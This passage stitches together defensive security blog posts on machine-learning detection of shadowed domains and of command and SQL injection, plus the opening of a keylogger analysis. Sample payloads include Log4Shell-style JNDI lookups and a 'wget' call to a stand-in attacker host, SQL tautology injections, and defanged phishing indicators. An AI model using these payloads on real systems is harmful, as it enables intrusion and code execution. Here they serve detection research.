| wiguhllnz43wxvq.vembanadhouse[.]com | 62.204.41[.]218 | RU | 2022-03-25 | 2022-03-25 | < 1 day |

Table 1. Example of compromised domains and their shadowed subdomains. *Time active column is based on the time first seen in pDNS, Whois, or archive.org. **It seems that the subdomain training.halont.edu[.]au was deactivated, and later the attacker accidentally hijacked it via DNS wildcarding. FQDN stands for Fully Qualified Domain Name and CC stands for the country-code of the IP address.
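
Two of the observations drawn from Table 1 are easy to express in code: subdomains of unrelated parents sharing a /24 subnet, and a subdomain resolving to a different country than its parent. The Python sketch below uses the standard `ipaddress` module. The function names are hypothetical, and the caller is assumed to supply country codes from a GeoIP source of their choice.

```python
import ipaddress
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple


def subnet_24(ip: str) -> str:
    """Return the /24 network that contains an IPv4 address, as a string."""
    return str(ipaddress.ip_network(f"{ip}/24", strict=False))


def shared_subnets(records: Iterable[Tuple[str, str]],
                   min_size: int = 2) -> Dict[str, List[str]]:
    """Group (fqdn, ip) records by /24 and keep groups with min_size or more names."""
    groups = defaultdict(list)
    for fqdn, ip in records:
        groups[subnet_24(ip)].append(fqdn)
    return {net: names for net, names in groups.items() if len(names) >= min_size}


def country_deviates(subdomain_cc: str, parent_cc: str) -> bool:
    """True when the subdomain's IP country differs from the parent's."""
    return subdomain_cc.upper() != parent_cc.upper()
```

Neither signal is conclusive on its own, since content delivery networks and hosted services routinely place subdomains in other networks and countries. That is why such signals are combined as features in a classifier.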

How to Detect Domain Shadowing

To address issues with threat hunting-based approaches to detect shadowed domains – such as lack of coverage, delay in detection and the need for human labor – we designed a detection pipeline leveraging passive DNS traffic logs (pDNS) based on work by Liu et al. Building on observations similar to the ones discussed in Table 1, we extracted over 300 features that could signal potential shadowed domains. Using these features, we trained a machine learning classifier that is the core of our detection pipeline.

Design Approach for the Machine Learning Classifier

We can arrange the features into three groups – those specific to the candidate shadowed domain itself, those related to the candidate shadowed domain’s root domain and those related to the IP addresses of the candidate shadowed domain.

The first group is specific to the candidate shadowed domain itself. Examples of these FQDN-level features include:

  • Deviation of the IP address from the root domain’s IP (and its country/autonomous system).
  • Difference in the first seen date compared to the root domain’s first seen date.
  • Whether the subdomain is popular.

The second feature group describes the candidate shadowed domain's root domain. Examples are:

  • The ratio of popular to all subdomains of the root.
  • The average IP deviation of subdomains.
  • The average number of days subdomains are active.

The third group of features is about the IP addresses of the candidate shadowed domain, for example:

  • The apex domain to FQDN ratio on the IP.
  • The average IP country deviation of subdomains using that IP.
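As a rough illustration of the first (FQDN-level) group, the sketch below computes a few of the listed features for one subdomain relative to its root domain. The `DnsRecord` layout, its field names and the `fqdn_features` helper are assumptions made for this example, not the pipeline's actual schema. The sample values are taken from Table 1 (kept defanged), with the first date in each row assumed to be the first seen date.

```python
from dataclasses import dataclass
from datetime import date


@dataclass(frozen=True)
class DnsRecord:
    """Hypothetical pDNS summary for one name (not the pipeline's real schema)."""
    fqdn: str
    ip: str
    country: str
    first_seen: date


def fqdn_features(candidate: DnsRecord, root: DnsRecord) -> dict:
    """Compute a few FQDN-level features relative to the root domain."""
    return {
        # Does the subdomain resolve somewhere other than its root domain?
        "ip_differs": candidate.ip != root.ip,
        "country_differs": candidate.country != root.country,
        # How long after the root domain did the subdomain first appear?
        "first_seen_gap_days": (candidate.first_seen - root.first_seen).days,
    }


root = DnsRecord("barwonbluff.com[.]au", "27.131.74[.]5", "AU", date(2018, 12, 13))
sub = DnsRecord("bancobpmmavfhxcc.barwonbluff.com[.]au", "62.204.41[.]247", "RU", date(2022, 3, 7))
features = fqdn_features(sub, root)
print(features)
```

A subdomain that appears years after its root domain, on an IP address in a different country, is the kind of deviation these features are meant to surface.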

As we generate over 300 features, many of which are highly correlated, we perform feature selection in order to use only the features that contribute most to the machine learning classifier’s performance. We use the Chi-squared test to find the best features individually and mutual Pearson correlation to decrease the weight of highly correlated features.
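The following is a minimal sketch of how a Chi-squared score and a Pearson correlation penalty can be combined, assuming binary features and binary labels. The greedy discounting scheme, the function names and the toy data are all assumptions for illustration; the post does not specify how the two measures are combined in the real pipeline.

```python
from math import sqrt


def chi2_binary(feature, labels):
    """Chi-squared statistic of a 2x2 contingency table (binary feature vs. binary label)."""
    n = len(labels)
    observed = {(f, y): 0 for f in (0, 1) for y in (0, 1)}
    for f, y in zip(feature, labels):
        observed[(f, y)] += 1
    stat = 0.0
    for f in (0, 1):
        for y in (0, 1):
            row = observed[(f, 0)] + observed[(f, 1)]
            col = observed[(0, y)] + observed[(1, y)]
            expected = row * col / n
            if expected:
                stat += (observed[(f, y)] - expected) ** 2 / expected
    return stat


def pearson(a, b):
    """Pearson correlation coefficient; returns 0.0 for constant columns."""
    n = len(a)
    mean_a, mean_b = sum(a) / n, sum(b) / n
    cov = sum((x - mean_a) * (y - mean_b) for x, y in zip(a, b))
    var_a = sum((x - mean_a) ** 2 for x in a)
    var_b = sum((y - mean_b) ** 2 for y in b)
    return cov / sqrt(var_a * var_b) if var_a and var_b else 0.0


def select_features(columns, labels, k):
    """Greedily pick k features, discounting scores by correlation with earlier picks."""
    scores = {name: chi2_binary(col, labels) for name, col in columns.items()}
    selected = []
    while len(selected) < min(k, len(columns)):
        def discounted(name):
            redundancy = max(
                (abs(pearson(columns[name], columns[s])) for s in selected), default=0.0)
            return scores[name] * (1.0 - redundancy)
        best = max((c for c in columns if c not in selected), key=discounted)
        selected.append(best)
    return selected


# Toy data: 'ip_differs' and 'country_differs' are perfectly correlated duplicates.
labels = [1, 1, 1, 1, 0, 0, 0, 0]
columns = {
    "ip_differs":      [1, 1, 1, 1, 0, 0, 0, 0],
    "country_differs": [1, 1, 1, 1, 0, 0, 0, 0],
    "is_popular":      [0, 0, 0, 1, 1, 1, 1, 0],
}
print(select_features(columns, labels, k=2))
```

In this toy data the duplicate feature scores as well as the first pick on its own, but its penalty drops it below the weaker yet less redundant `is_popular` column.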

We can select classifiers with different performance and complexity tradeoffs depending on the desired use case. Using a random forest classifier, we can achieve 99.99% accuracy, 99.92% precision and 99.87% recall using only the 64 best features and allowing each of 200 trees in the random forest to use at most eight features and to have a maximum depth of four. A simpler classifier – using only the top 32 features where each tree can only use at most four features and have a depth of two – can achieve 99.78% accuracy, 99.87% precision and 92.58% recall.

During a two-month period, our classifier found 12,197 shadowed domains averaging a couple hundred detections every day. Looking at these domains in VirusTotal, we find that only 200 were marked as malicious by at least one vendor. We conclude from these results that domain shadowing is an active threat to the enterprise, and it is hard to detect without leveraging automated machine learning algorithms that can analyze large amounts of DNS logs.

A Phishing Campaign Using Shadowed Domains

Next, we dive deeper into the phishing campaign we used as an example in Table 1. Clustering – based on IP address and root domains – the results from our detector, we found 649 shadowed domains created under 16 compromised domain names for this campaign. Figure 1 is a screenshot of barwonbluff.com[.]au, one of the compromised domains. Even though it seems to operate normally, attackers have created many subdomains under it that they can use in phishing links such as hxxps[:]//snaitechbumxzzwt.barwonbluff[.]com.au/bumxzzwt/xxx.yyy@target.it.
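The clustering step can be pictured with the sketch below, which links detections that share a root domain or an IP address using a small union-find structure. The exact clustering method is not described in this post, so this is only one plausible reading. The hard-coded suffix set stands in for the Public Suffix List, and the `refang`, `root_domain` and `cluster` helpers are hypothetical names. The input rows come from Table 1.

```python
from collections import defaultdict

# Tiny stand-in for the Public Suffix List; an assumption for this sketch only.
MULTI_LABEL_SUFFIXES = {"com.au", "edu.au"}


def refang(value: str) -> str:
    """Undo the '[.]' defanging used in the report."""
    return value.replace("[.]", ".")


def root_domain(fqdn: str) -> str:
    """Return the registrable domain, e.g. 'a.b.example.com.au' -> 'example.com.au'."""
    labels = refang(fqdn).lower().rstrip(".").split(".")
    keep = 3 if ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES else 2
    return ".".join(labels[-keep:])


def cluster(detections):
    """Group (fqdn, ip) detections that share a root domain or an IP address."""
    parent = {}

    def find(x):
        parent.setdefault(x, x)
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    for fqdn, ip in detections:
        # Link the root-domain node and the IP node of every detection.
        parent[find(("root", root_domain(fqdn)))] = find(("ip", ip))

    clusters = defaultdict(set)
    for fqdn, ip in detections:
        clusters[find(("ip", ip))].add(fqdn)
    return list(clusters.values())


detections = [
    ("bancobpmmavfhxcc.barwonbluff.com[.]au", "62.204.41[.]247"),
    ("tomsvprfudhd.barwonbluff.com[.]au", "62.204.41[.]77"),
    ("carriernhoousvz.brisbanegateway[.]com", "62.204.41[.]218"),
    ("wiguhllnz43wxvq.vembanadhouse[.]com", "62.204.41[.]218"),
    ("ocwdvmjjj78krus.halont.edu[.]au", "62.204.41[.]218"),
]
for group in cluster(detections):
    print(sorted(group))
```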

The screenshot shows an image of the Barwon Bluff in Australia and represents an originally benign domain and legitimate website.
Figure 1. Screenshot of barwonbluff.com[.]au – an originally benign domain.
When users click on the above phishing URL, they are redirected to a landing page, as shown in Figure 2. The phishing page on login.elitepackagingblog[.]com wants to steal Microsoft user credentials. To avoid falling for similar phishing attacks, users need to check the domain name of the website they are visiting and the lock icon next to the URL bar before entering their credentials.

The screenshot shows a page designed to look like a Microsoft login page, but the lock and domain shown in the URL bar do not connect to a Microsoft domain.
Figure 2. Screenshot of the phishing landing page on elitepackagingblog[.]com, where victims are redirected from the snaitechbumxzzwt.barwonbluff[.]com.au shadowed domain. Source: Joe Sandbox.
Figure 3 is a screenshot of halont.edu[.]au after the website owners found out that their domain name was compromised. Unfortunately, we observed many shadowed domains created under this domain name before the owners realized it was hacked. These cases further emphasize the necessity to automatically detect these domains because it is hard for domain owners to discover that they are compromised.

The screenshot shows a progress bar and launch date, along with a title that reads, "Yes, we've been hacked, and are rebuilding."
Figure 3. Screenshot of halont.edu[.]au, an originally benign domain that is being rebuilt after compromise.

Conclusion

Cybercriminals use shadowed domains for various illicit ventures, including phishing and botnet operations. We observe that it is challenging to detect shadowed domains as vendors on VirusTotal cover less than 2% of these domains. As traditional approaches based on threat research are too slow and fail to uncover the majority of shadowed domains, we turn to an automated detection system based on pDNS data. Our high-precision machine learning-based detector processes terabytes of DNS logs and discovers hundreds of shadowed domains daily. Palo Alto Networks offers multiple security subscriptions – including DNS Security and Advanced URL Filtering – that leverage our detector to protect against shadowed domains. Additionally, customers can leverage Cortex XDR to alert on and respond to domain shadowing when used for command and control communications.

Acknowledgements

We want to thank Wei Wang and Erica Naone for their invaluable input on this blog post.

Indicators of Compromise

halont.edu[.]au
training.halont.edu[.]au
ocwdvmjjj78krus.halont.edu[.]au
baqrxmgfr39mfpp.halont.edu[.]au
barwonbluff.com[.]au
bancobpmmavfhxcc.barwonbluff.com[.]au
snaitechbumxzzwt.barwonbluff[.]com.au
snaitechbumxzzwt.barwonbluff.com[.]au/bumxzzwt/xxx.yyy@target.it
tomsvprfudhd.barwonbluff.com[.]au
brisbanegateway[.]com
carriernhoousvz.brisbanegateway[.]com
vembanadhouse[.]com
wiguhllnz43wxvq.vembanadhouse[.]com
login.elitepackagingblog[.]com
login.elitepackagingblog[.]com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=637823463352371687.MDY0MjMzYjMtOWNlZC00ODA5LWE1YWQtOWMyMTIwYTZiOTIwODZiNTMyN2MtZWQ3ZC00Mzg4LWJjMzktNGQxYjQ1MDFkNmNi&ui_locales=en-US&mkt=en-US&state=q81i2V5Z572r5P2TuEfGYg0HZLgy9vMW3HMxjfeMMm60rJIlPgKe4SKR8D86gIjkNlgD6cd8jK754mEWDiHZtRQ1pzeGpqaVJOCkSmAUGOWUcOxbKCr2sPnoBds6H7fZCJdLqcotpA2NF3vvVbRDSSWk3xhQuxnXOoJoN2pj0RhiR97YEUkUwqEEsCoboffTLGgVrjaDy_ASgmhE_7mkvYE6YsXicgxoEzDqhrjxB_vFcTt_u7o1rrAYcWIv-0vZ4vPVToJ7Nwqlf6BHPz7zPQ&x-client-SKU=ID_NETSTANDARD2_0&x-client-ver=6.12.1.0&sso_reload=true#ODQuMTccGFvbGEucGVsbGVnYXRhQHNuYWl0ZWNoLml0=

Additional Resources

Don’t Let One Rotten Apple Spoil the Whole Barrel: Towards Automated Detection of Shadowed Domains

 

Zero-Day Exploit Detection Using Machine Learning

Executive Summary

Code injection is an attack technique widely used by threat actors to launch arbitrary code execution on victim machines through vulnerable applications. In 2021, the Open Web Application Security Project (OWASP) ranked it as third in the top 10 web application security risks.

Given the popularity of code injection in exploits, signatures with pattern matches are commonly used to identify the anomalies in network traffic (mostly URI path, header string, etc.). However, injections can happen in numerous forms, and a simple injection can easily evade a signature-based solution by adding extraneous strings. Therefore, signature-based solutions will often fail on the variants of the proof of concept (PoC) of Common Vulnerabilities and Exposures (CVEs). In this blog, we explore how deep learning models can help provide more flexible coverage that is more robust to attempts by attackers to avoid traditional signatures.

Palo Alto Networks Next-Generation Firewall customers receive protections from such types of attacks through Cloud-Delivered Security Services including Intrusion Prevention capabilities in Advanced Threat Prevention, as well as through WildFire.

Related Unit 42 topics SQL injection, command injection, deep learning

Why Intrusion Prevention System Signatures Aren’t Sufficient – How Machine Learning Can Help

Intrusion Prevention System (IPS) signatures have long proven to be an efficient defense against cyberattacks. Relying on predefined signatures, an IPS can accurately detect known threats with few or no false positives. However, creating IPS rules requires a proof of concept or technical analysis of a given vulnerability, so it is challenging for IPS signatures to detect unknown attacks, for which that knowledge is lacking. For example, remote code execution exploits are often crafted with vulnerable URI/parameters and malicious payloads, and both parts should be identified to ensure threat detection. In zero-day attacks, however, both parts can be either unknown or obfuscated, making it difficult to have the needed IPS signature coverage. In our experience, threat researchers face the following set of challenges:

  • False negatives. Variations and zero-day attacks are seen every day, and IPS cannot have full coverage for all of them due to a lack of attack details beforehand.
  • False positives. To address variants and zero-day attacks, generic rules with loose conditions are created, which inevitably brings the risk of false alarm.
  • Latency. The time lag between vulnerability disclosure, security vendors rolling out protections and customers applying security patches represents a significant window for attackers to exploit the end user.

While these problems are innate to the nature of IPS signatures, machine learning techniques can address these shortcomings. Based on real-world zero days and benign traffic, we trained machine learning models to address common attacks such as remote code execution and SQL injection. From our recent research, presented in this blog, we find that these models can be very helpful in zero-day exploit detection, being both more robust and quicker to respond than traditional IPS methods.

In the following sections, we’ll share some case studies and insights into how machine learning models can be incorporated into exploit detection modules, and how effective this can be.

Detection Case Studies on Zero-Day Exploits

Case Study 1: Command Injection Detection

Command injection has long been a major threat in network security. Due to their easy-to-exploit nature and severe impact, command injection vulnerabilities have the potential to bring tremendous damage to affected organizations, especially when patches come late. Last year, vulnerabilities in commonly used software such as Log4Shell and SpringShell placed hundreds of millions of Java-based servers and web applications at risk. Meanwhile, vendors were busy updating IPS signatures to cover constantly evolving attack patterns derived from the original exploit in a frustrating cat-and-mouse chase, and we still see obfuscated attacks attempted today.

Generally, for those vulnerabilities which include specific paths or parameters, IPS signatures are a good idea since attacks can be accurately filtered out by the URI and suspicious payload. However, some exploits of critical vulnerabilities can be flexible due to the nature of HTTP protocols. For example, the Log4Shell vulnerability can be triggered through all kinds of user inputs. Moreover, the complexity of HTTP encoding methods allows attackers to evade normal detection using partial or mixed encoding. In such situations, machine learning methods can more accurately identify abnormal traffic, yielding corresponding verdicts with the knowledge of previously seen malicious sample payloads.
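To make the encoding problem concrete, the sketch below applies a deliberately naive signature for the Log4Shell lookup prefix to a few payload variants. The regular expression, the helper names and the `attacker.example` host are assumptions for illustration and do not represent any real IPS rule. Percent-decoding before matching recovers some variants, while the nested-lookup obfuscation still slips through.

```python
import re
from urllib.parse import unquote

# A deliberately naive signature for the Log4Shell lookup prefix (illustrative only).
SIGNATURE = re.compile(r"\$\{jndi:", re.IGNORECASE)


def matches_raw(value: str) -> bool:
    """Apply the signature to the value exactly as it appears on the wire."""
    return bool(SIGNATURE.search(value))


def matches_decoded(value: str, max_rounds: int = 3) -> bool:
    """Percent-decode repeatedly (to handle double encoding) before matching."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return bool(SIGNATURE.search(value))


samples = {
    "plain": "${jndi:ldap://attacker.example/a}",
    "partially encoded": "%24%7Bjndi:ldap://attacker.example/a}",
    "double encoded": "%2524%257Bjndi:ldap://attacker.example/a}",
    "nested lookup": "${${lower:j}ndi:ldap://attacker.example/a}",
}
for name, payload in samples.items():
    print(f"{name:18} raw={matches_raw(payload)} decoded={matches_decoded(payload)}")
```

Each new obfuscation calls for another normalization step or another rule, which is the cat-and-mouse dynamic described above.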

We trained a state-of-the-art Convolutional Neural Network (CNN) with cutting edge deep learning technologies loosely based on previous academic research on Temporal Convolutional Networks. While variable length inputs suggest that a recurrent model structure such as a Recurrent Neural Network (RNN) or a Long Short-Term Memory (LSTM) Network may be suitable, research shows that a simple convolutional architecture often outperforms recurrent models. Our model has learned more generalizable common patterns in command injection exploits while also being specific enough to avoid false positives. In the following sections, we discuss case studies of command injection exploits and how our new machine learning model is able to accurately detect them.
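One reason a convolutional architecture copes with variable-length inputs is that a filter slides over the sequence and a pooling step then collapses the result to a fixed size. The toy sketch below shows that mechanic in plain Python. It is not the model described in this post: the two-dimensional character embedding and the filter weights are hand-picked assumptions rather than learned parameters, and all names are hypothetical.

```python
def encode(text: str, vocab_size: int = 128) -> list[int]:
    """Map each character to an integer ID; non-ASCII characters share ID 0."""
    return [ord(c) if ord(c) < vocab_size else 0 for c in text]


def conv1d_global_max(ids, filters, embedding):
    """Slide each filter over the sequence and keep its maximum activation.

    ids:       sequence of character IDs (length must be >= the widest filter)
    filters:   list of filters, each a list of per-position weight vectors
    embedding: table mapping a character ID to its vector
    """
    vectors = [embedding[i] for i in ids]
    pooled = []
    for filt in filters:
        width = len(filt)
        activations = []
        for start in range(len(vectors) - width + 1):
            window = vectors[start:start + width]
            total = sum(w * x for wv, xv in zip(filt, window) for w, x in zip(wv, xv))
            activations.append(max(0.0, total))  # ReLU
        pooled.append(max(activations))          # global max pooling
    return pooled


# Hand-picked 2-d embedding: [is shell metacharacter, is alphanumeric].
META = set(";|&`$")
embedding = [[1.0 if chr(i) in META else 0.0, 1.0 if chr(i).isalnum() else 0.0]
             for i in range(128)]
filters = [
    [[1.0, 0.0], [0.0, 1.0]],              # metacharacter followed by an alphanumeric
    [[0.0, 1.0], [0.0, 1.0], [0.0, 1.0]],  # run of three alphanumerics
]

short = conv1d_global_max(encode("q=shoes"), filters, embedding)
longer = conv1d_global_max(encode("q=shoes;wget http://attacker.example/x"), filters, embedding)
print(short, longer)
```

Both inputs yield a vector with one value per filter regardless of their length, and the first filter responds more strongly to the input containing `;wget`.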

1. Atlassian Confluence vulnerability (CVE-2022-26134)

Atlassian Confluence is a web-based corporate wiki tool used to help teams to collaborate and share knowledge efficiently. One recent remote code execution vulnerability, CVE-2022-26134, targets Confluence versions 1.3.0-7.4.17, 7.13.0-7.13.7, 7.14.0-7.14.3, 7.15.0-7.15.2, 7.16.0-7.16.4, 7.17.0-7.17.4 and 7.18.0-7.18.1. We have observed successful exploitation leveraging this vulnerability to perform Cerber Ransomware attacks.

Figure 1. One PoC attack leveraging CVE-2022-26134.

Malicious but arbitrary commands can be inserted in the payload to perform various activities. The machine learning model can easily distinguish between benign and malicious activities and block the attacks using different commands without knowing the full context of the application.

2. Unknown IoT Zero-Day Attack

Sometimes we see alerts from our internal threat hunting research platform when processing real-world traffic. After filtering out false positives, these types of detections usually indicate that a zero-day attack has been captured. For example, on April 29, 2022, we saw the HTTP request shown in Figure 2.

An HTTP request that could be attributed to a previously unknown attack targeting certain MIPS-based smart devices.
Figure 2. An HTTP request that triggered an alert on our machine learning model.

The command and control (C2) server was down shortly after we got the traffic, so it is difficult to verify details of the exploit and payload. However, according to our threat intelligence, this could be attributed to a previously unknown attack targeting certain MIPS-based smart devices.

With traditional IPS technologies, it’s possible to miss such attacks since the vulnerable URI and parameters have never been seen before; it’s hard to determine if the requested data is benign or suspicious. In this specific case, our IPS with a default configuration did not result in an alert, but our machine learning model successfully identified the attack with a high confidence score.

3. Tenda AC18 Router Vulnerability (CVE-2022-31446)

The Tenda AC18 router is prone to a remote code execution vulnerability, allowing attackers to execute arbitrary commands on the device. Not long after the vulnerability was published, a Palo Alto Networks researcher discovered an exploit in the wild targeting this specific CVE, as shown in Figure 3.

Exploit in the wild targeting CVE-2022-31446, a remote code execution vulnerability in Tenda AC18 routers.
Figure 3. Exploit in the wild targeting CVE-2022-31446.

Similar to the zero-day IoT attack mentioned above, it's difficult for traditional IPS solutions to detect such attacks due to their inherent limitations. However, our machine learning model detected the exploit with high confidence. The machine learning model identifies that requests in the POST body are highly suspicious and suggests the IP address shown in Figure 3 should be further investigated with correlated malicious samples.

Case Study 2: SQL Injection Detection

SQL injections are another notorious and challenging threat in network security. In this type of attack, threat actors alter SQL queries and inject malicious code by exploiting vulnerabilities. SQL injections may result in information modification, sensitive data leakage and unauthorized command executions in underlying database systems. Due to the serious potential impact of SQL injection vulnerabilities, their prompt detection and zero-day exploit prevention on the network side are critical to fortifying an organization’s assets.

Unfortunately, the task is challenging with traditional IPS systems due to time limitations and the need for technical expertise. Traditional systems require properly composing and testing customized signatures to cover zero-day SQL exploitations, such as exploits targeting CVE-2022-0332 and CVE-2022-34265. Even worse, attackers may utilize readily available hacking tools such as sqlmap to generate SQL injection exploitations that are very difficult to cover with IPS signatures. In this case, machine learning solutions can effectively distinguish malicious SQL injection payloads from benign traffic by examining carefully selected features covering a variety of SQL injection exploitations. The following vulnerability case studies demonstrate the effectiveness and efficiency of the machine learning solutions we have developed.

1. Moodle vulnerability (CVE-2022-0332)

Moodle is a free and open source learning management system with more than 300 million users. However, Moodle versions 3.11 to 3.11.4 have a vulnerability (CVE-2022-0332) in the server.php file due to the lack of user input sanitization, making it possible to use the union operator to query unexpected data. When given the payload shown in Figure 4, vulnerable versions of Moodle will query the SQLite engine version with the function sqlite_version() and return it to the user. Our machine learning solution derives features that capture the union-select SQL injection snippet, which allows it to flexibly detect exploitations of CVE-2022-0332.

Figure 4. One PoC leveraging CVE-2022-0332.

After decoding, the PoC of CVE-2022-0332 is shown in Figure 5.

Figure 5. Decoded PoC of CVE-2022-0332.

2. Django vulnerability (CVE-2022-34265)

Django is a widely used framework for building websites; sites built with it include Instagram, Disqus and Pinterest. CVE-2022-34265 is an issue affecting the Django framework. This vulnerability is caused by an improper check on parameter values for the Trunc() and Extract() functions, which may lead to unexpected SQL statement execution. Two PoCs for CVE-2022-34265 are shown in Figures 6 and 7. Both payloads use a boolean injection sub-payload followed by a stacked injection sub-payload. When a payload is appended to the predefined SQL statement, the first statement split by the semicolon will always be true because of the or 1=1. The second part causes the program to sleep for five seconds, which the browser sees as a five-second wait. That delay on the front end indicates that the injected SQL statement executed successfully, which in turn indicates that the SQL injection vulnerability exists. Our machine learning solution can also effectively detect SQL injection patterns such as or 1=1 statements, which can help us effectively prevent the exploitation of such vulnerabilities.
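The boolean part of such a payload can be reproduced with a generic example. The sketch below uses Python's built-in sqlite3 module and a made-up `users` table. It is not the Django code path affected by CVE-2022-34265, and it leaves out the stacked sleep statement because sqlite3's `execute()` accepts only a single statement. It shows why an appended or 1=1 makes a condition always true, and how a bound parameter avoids the problem.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?)", [("alice", "a1"), ("bob", "b2")])


def lookup_unsafe(name: str):
    """Builds SQL by string concatenation: user input becomes part of the statement."""
    query = "SELECT name FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


def lookup_safe(name: str):
    """Passes user input as a bound parameter, so it is only ever treated as data."""
    return conn.execute("SELECT name FROM users WHERE name = ?", (name,)).fetchall()


payload = "nobody' or 1=1 --"
print(lookup_unsafe(payload))  # the always-true clause matches every row
print(lookup_safe(payload))    # no user is literally named "nobody' or 1=1 --"
```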

Figure 6. Two PoCs for CVE-2022-34265.
Figure 7. After decoding, two PoCs for CVE-2022-34265.

3. sqlmap-generated exploitation

sqlmap is an open source tool used in penetration testing to detect and exploit SQL injection flaws, which can automate the process of crafting exploitations of SQL injection vulnerabilities. While the tool can be used for legitimate purposes, it can also be abused by attackers.

Figure 8 shows a PoC of SQL injection from sqlmap. After decoding (Figure 9), we can observe the snippet and 1043=1043, which is a widely used pattern for blind SQL exploitation. The attacker can leverage the statement to probe web services and database systems for vulnerabilities. The pattern is similar to or 1=1 (see our discussion of CVE-2022-34265), but sqlmap can generate polymorphic SQL injection exploitations as long as the statement is always true after and.

These types of patterns are challenging to detect via IPS signatures. While a traditional signature might only be able to match one and 1=1 case, our machine learning solution can properly cover the exploitation with dedicated features for all similar and 1=1 cases.
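The gap between a single literal signature and a more general feature can be shown with two regular expressions. The sketch below is only an illustration of the idea, not the feature set used by our model: `LITERAL` matches exactly and 1=1, while `TAUTOLOGY` uses a backreference to match any and/or followed by the same number on both sides of the equals sign. Both patterns, the helper name and the sample query strings are assumptions.

```python
import re
from urllib.parse import unquote_plus

# One literal signature versus a generalized "same literal on both sides" pattern.
LITERAL = re.compile(r"\band\s+1\s*=\s*1\b", re.IGNORECASE)
TAUTOLOGY = re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*\1\b", re.IGNORECASE)


def has_numeric_tautology(raw_query: str) -> bool:
    """Decode the query string, then look for AND/OR followed by N=N."""
    return bool(TAUTOLOGY.search(unquote_plus(raw_query)))


queries = [
    "id=1%20and%201=1",
    "id=1+AND+1043%3D1043",
    "id=1+and+1043=1044",
    "q=rock+and+roll",
]
for raw in queries:
    decoded = unquote_plus(raw)
    print(f"{decoded!r}: literal={bool(LITERAL.search(decoded))} "
          f"general={has_numeric_tautology(raw)}")
```

Even the generalized pattern covers only numeric equalities, so other always-true expressions would still need their own handling.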

One PoC from sqlmap. SQL injection detection in cases such as this can be challenging with traditional signature-based solutions.
Figure 8. One PoC from sqlmap.
The decoded PoC from sqlmap shows a widely used pattern for blind SQL exploitation. Patterns like this can make injection detection challenging.
Figure 9. The decoded PoC from sqlmap.

Machine Learning Test Results

To detect zero-day exploits, we trained two machine learning models: one for SQL injection attacks and one for command injection attacks. We prioritized a low false positive rate in order to minimize the adverse effects of deploying these models for detection. We trained both models on HTTP GET and POST requests. To generate these datasets, we combined multiple sources, including tool-generated malicious traffic, live traffic, internal IPS data sets and more.

From ~1.15 million benign and ~1.5 million malicious samples containing SQL queries, our SQL model achieved a 0.02% false positive rate and a 90% true positive rate.

From ~1 million benign and ~2.2 million malicious samples containing web searches and possible command injections, our command injection model achieved a 0.011% false positive rate and a 92% true positive rate.
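To put these rates in terms of sample counts, the short calculation below multiplies each rate by the approximate dataset sizes given above. Because the sizes are rounded in the text, the resulting counts are rough estimates rather than reported results, and the helper name is hypothetical.

```python
def expected_counts(benign: int, malicious: int, fpr: float, tpr: float) -> dict:
    """Translate rates into approximate sample counts for a dataset of the given size."""
    return {
        "false_positives": round(benign * fpr),
        "true_positives": round(malicious * tpr),
        "missed_attacks": round(malicious * (1 - tpr)),
    }


sql = expected_counts(benign=1_150_000, malicious=1_500_000, fpr=0.0002, tpr=0.90)
cmd = expected_counts(benign=1_000_000, malicious=2_200_000, fpr=0.00011, tpr=0.92)
print("SQL injection model:", sql)
print("Command injection model:", cmd)
```

At these rates, the benign samples flagged by each model number in the low hundreds out of roughly a million.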

These detections are particularly useful because they can provide protections against new zero-day attacks, while being resistant to small modifications that might evade traditional IPS signatures.

Conclusion

Command injection and SQL injection attacks continue to be some of the most common and most concerning threats affecting web applications. While traditional signature-based solutions remain effective against out-of-the-box exploits, they often fail to detect variants; a motivated adversary can make minimal modifications and evade such solutions.

To combat these ever-evolving threats, we developed a context-based deep learning model that proved to be effective in detecting the latest high profile attacks. Our models were able to successfully detect zero-day exploits such as the Atlassian Confluence vulnerability, the Moodle vulnerability and the Django vulnerability. These types of flexible detections will prove to be critical in providing comprehensive defense in an ever-evolving malware landscape.

To protect our customers, the Palo Alto Networks Next-Generation Firewall uses a combined inline and cloud solution. Our traditional IPS solutions remain effective for protecting against a significant portion of existing exploits, including SQL injections and command injections. In addition, the machine learning models we explored in this blog have the potential to provide even more robust protections beyond IPS signatures.

Additional Resources

OWASP Top Ten
A03: 2021 - Injection
sqlmap
An Empirical Evaluation of Generic Convolutional and Recurrent Networks for Sequence Modeling

Case study 1 updated Nov. 8, 2022, to remove some outdated results information.

OriginLogger: A Look at Agent Tesla’s Successor

Executive Summary

On March 4, 2019, one of the most well-known keyloggers used by criminals, called Agent Tesla, closed up shop due to legal troubles. In the announcement message posted on the Agent Tesla Discord server, the keylogger’s developers suggested people switch over to a new keylogger: “If you want to see a powerful software like Agent Tesla, we would like to suggest you OriginLogger. OriginLogger is an AT-based software and has all the features.” OriginLogger is a variant of Agent Tesla. As such, the majority of tools and detections for Agent Tesla will still trigger on OriginLogger samples.

Recently, when sitting down to analyze some malware tagged as Agent Tesla, I was surprised to learn I was actually looking at something else. This fact revealed itself to me when I began analyzing the malware families’ configurations at scale after creating tooling to extract them.

In this blog, I will cover the OriginLogger keylogger malware, how it handles the string obfuscation for configuration variables and what I found when looking at the extracted configurations that allowed for better identification and further pivoting.

Palo Alto Networks customers receive protections from both OriginLogger and its predecessor malware Agent Tesla through Cortex XDR and the Next-Generation Firewall with cloud-delivered security services including WildFire and Advanced Threat Prevention.

Related Unit 42 Topics Agent Tesla

OriginLogger Builder

When I began researching OriginLogger, I could find little to no public information about it. There are several Agent Tesla-related analysis blogs that I now recognize as pertaining to OriginLogger – sometimes tagged as “AgentTeslav3” – but otherwise, the public internet is pretty light on relevant information.

